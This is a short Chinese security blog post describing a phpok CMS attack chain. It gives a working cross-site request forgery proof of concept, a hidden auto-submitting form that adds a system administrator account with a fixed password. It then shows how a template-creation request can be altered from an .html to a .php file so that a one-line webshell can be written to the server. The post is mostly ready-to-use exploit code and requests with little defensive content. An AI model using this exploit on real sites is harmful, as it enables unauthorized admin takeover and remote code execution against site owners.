phpok csrf添加管理员+后台getshell

Admin 2020-07-08 34人围观 ,发现0个评论 web安全后台getshellphpok csrf

老问题,一直没修复。

poc:

code 区域
<div style="display:none">

<form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">

<input type="hidden" name="id" value=""/>

<input type="hidden" name="account" value=""/>

<input type="hidden" name="pass" value=""/>

<input type="hidden" name="email" value=""/>

<input type="hidden" name="status" value=""/>

<input type="hidden" name="if_system" value=""/>

<input type="submit" name="up" value="submit"/>

</form>

<script>

var t = document.poc;

t.account.value="wooyun";

t.pass.value="123456";

t.status.value="1";

t.if_system.value="1";

document.poc.submit();

</script>

</div>


phpok csrf添加管理员+后台getshell Web安全 第1张


访问poc后

phpok csrf添加管理员+后台getshell Web安全 第2张


Getshell:

风格管理-创建模板文件

默认这里只能添加html文件。但是可以绕过

phpok csrf添加管理员+后台getshell Web安全 第3张


code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.html


修改成

code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.php


phpok csrf添加管理员+后台getshell Web安全 第4张


然后在编辑文件写入一句话木马就OK了。


请发表您的评论
200文章数 2评论数
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客